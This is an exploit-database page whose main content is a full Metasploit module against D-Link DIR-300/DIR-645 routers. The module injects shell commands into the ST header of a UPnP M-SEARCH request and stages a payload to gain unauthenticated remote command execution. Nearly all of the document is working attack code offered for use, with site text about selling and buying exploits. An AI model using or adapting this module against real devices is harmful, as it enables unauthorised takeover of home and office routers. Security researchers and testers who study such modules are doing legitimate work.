0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
D-Link DIR-300 / DIR-645 Unauthenticated UPnP M-SEARCH Multicast Command Injection
[##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
requests. This module has been tested on DIR-300 and DIR-645 devices. Zacharia Cutlip
has initially reported the DIR-815 vulnerable. Probably there are other devices also
affected.
},
'Author' =>
[
'Zachary Cutlip', # Vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
],
'DisclosureDate' => 'Feb 01 2013',
'Privileged' => true,
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
}
]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(1900)
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
res = nil
1.upto(5) do
res,_,_ = udp_sock.recvfrom(65535, 1.0)
break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
udp_sock.sendto(pkt, rhost, rport, 0)
end
# UPnP response:
# [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
# we do not check for the Device ID (DIR-645) and for the firmware version because there are different
# dlink devices out there and we do not know all the vulnerable versions
if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:uuid:`#{cmd}`\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
end
def exploit
print_status("#{rhost}:#{rport} - Trying to access the device via UPnP ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to access the vulnerable device")
end
print_status("#{rhost}:#{rport} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 950
)
end
# the packet stuff was taken from the module miniupnpd_soap_bof.rb
# We need an unconnected socket because SSDP replies often come
# from a different sent port than the one we sent to. This also
# breaks the standard UDP mixin.
def configure_socket
self.udp_sock = Rex::Socket::Udp.create({
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
})
add_socket(self.udp_sock)
end
#
# Required since we aren't using the normal mixins
#
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
# Accessor for our UDP socket
attr_accessor :udp_sock
end
# 0day.today [2024-11-14] #